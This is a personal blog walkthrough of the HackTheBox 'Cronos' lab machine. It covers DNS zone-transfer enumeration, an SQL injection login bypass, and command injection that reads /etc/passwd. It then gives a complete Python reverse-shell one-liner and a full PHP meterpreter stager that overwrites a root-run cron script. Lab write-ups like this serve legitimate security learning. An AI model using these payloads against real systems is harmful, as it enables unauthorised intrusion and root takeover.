[hackthebox]Cronos

Introduction

I have not developed hacker’s hunch yet and hope to do continuous learning to learn more techniques and hopefully I can develop a hunch soon, I am following a few walkthroughs and htb’s official guide, to be honest if I am to start hacking this machine I think I will take two weeks to find the root flag and another two weeks to get the user’s flag.

All machines have the same goal, get the user’s flag from user.txt and root’s flag from root.txt.

Doing hackthebox machines I have learned things which I have never used before for system administration.

The hackthebox exercises also help me to understand the consequences if there are misconfigurations in the system.

Pre-requisite

  1. Very simple sql injection techniques, which can be learned from DVWA. Read this for different types of comment syntax supported.
  2. Port scanning with nmap.
  3. Basic command injection, which can be learned from DVWA.

What have I learned?

  1. DNS subdomains enumeration with dig.
  2. Learn to check the schedule job in crontab, in order to find out if there is any exploit.
  3. Learn how to drop a shell when connecting with nc by using named pipe.
  4. Learn how to preserve the php variable when using echo and piped to tee.

Enumeration with nmap

nmap -sV -sC -oN cronos 10.10.10.13 -vvv

-sC uses the default script to test for service vulnerability.

cronos1
There are tcp/53 (DNS) and http service (tcp/80), which are good attack surfaces. SSH itself is not so easy, there is one username enumeration vulnerability but I would try to avoid brute forcing as it takes a long time if the password is strong and it depends on the name list with weak passwords.

Checking the web

cronos2, although this is a default page but I cannot find any exploit in this static page, I tried http://10.10.10.13/../../etc/apache2/apache2.conf to try to see if I can read out of its document root /var/www but I could not, see the screenshot below.
cronos3

On HTB machines if there is web service always try to fuzz it with dirb or dirbuster or gobuster, I will use dirb http://10.10.10.13 which uses the default /usr/share/wordlists/dirb/common.txt

cronos4

After some time there is no any other directories in the web, see below:
cronos19

Check on the dns service

While waiting for the dirb results I will check the tcp/53 service.
Check to see if 10.10.10.13 has a reverse entry.
cronos6
10.10.10.13 FQDN is ns1.cronos.htb, so it is assumed that cronos.htb is the domain, can I enumerate more sub domains from the DNS server to find out more entries.

In nslookup do set q=any and see what are the results…
cronos7
so admin.cronos.htb is a mail server… are there more subdomain?

Use dig to find more A records from the cronos.htb domain, dig @dns_address domain_name axfr where axfr is zone transfer.

cronos8
So apparently the cronos machine’s dns server supports zone transfer and threw up all its entries.

Back to test the web

The dirb enumeration has not finished while checking the FQDNs discovered from cronos’ dns.

Because I am not changing my own dns server, hence I will add the newly found sub domains into the hosts file.
echo "10.10.10.13 http://www.cronos.htb admin.cronos.htb" | tee -a /etc/hosts

cronos9

cronos10
looking at the page source there are only links to external websites.

cronos11
http://admin.cronos.htb is a login page.
So I tested in the password field, ' or 1=1#, I could not get anything, and test on the username field ' or 1=1# I am login.
cronos12
cronos13

Test if the field is vulnerable to command injection.
by doing 8.8.8.8| cat /etc/passwd

For reverse connection I am setting up a server with netcat – nc -lvnp 4444
To test if the server has python python -c "print('python exists')" if your text appears in the web site means there is a python interpreter.
This is my payload to connect to my netcat server:
python -c "import os;import socket;import subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.5',4444));os.dup2(s.fileno(),0),os.dup2(s.fileno(),1),os.dup2(s.fileno(),2);subprocess.call(['/bin/sh', '-i']);"

cronos17

Get the user flag

cronos18

Privilege escalation

I am trying to use sudo -l but I cannot get the permission list….
cronos20

To be honest I was stucked here… so I read the guide.. and it turned out that crontab has a job that executed by root…
cronos21

The ownership of the file – artisan – is www-data, which means the user I gained can be used to modify the file.
cronos22

A look into the php file (artisan) the application will exit hence I cannot append the reverse shell code in the php file.

To make a php reverse shell meterpreter use msfvenom.
msfvenom -p php/meterpreter/reverse_tcp -o venom.php in your kali linux machine, you need to edit the ip address and the port, and also to change the single quote to double quotes. This is the payload i used:

echo '/*<?php /**/ error_reporting(0); $ip = "10.10.14.5"; $port = 1234; if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") && ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } else { eval($b); } die();' | tee /var/www/laravel/venom.php; mv /var/www/laravel/venom.php /var/www/laravel/artisan

The entire php codes have to be enclosed by single quote, at first I was using double quotes but those php variables which has a $ disappeared. Also need to make sure the php code uses all double quotes, this is because single quote within the php code will be removed if double quotes within the php code is not used.

cronos26

To set up the meterpreter in msfconsole first use exploit/multi/handler then set payload php/meterpreter/reverse_tcp which is the same payload I used to generate the php payload with msfvenom. I modify the lhost and the lport then i type run to start listening for incoming meterpreter connection.
cronos27

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s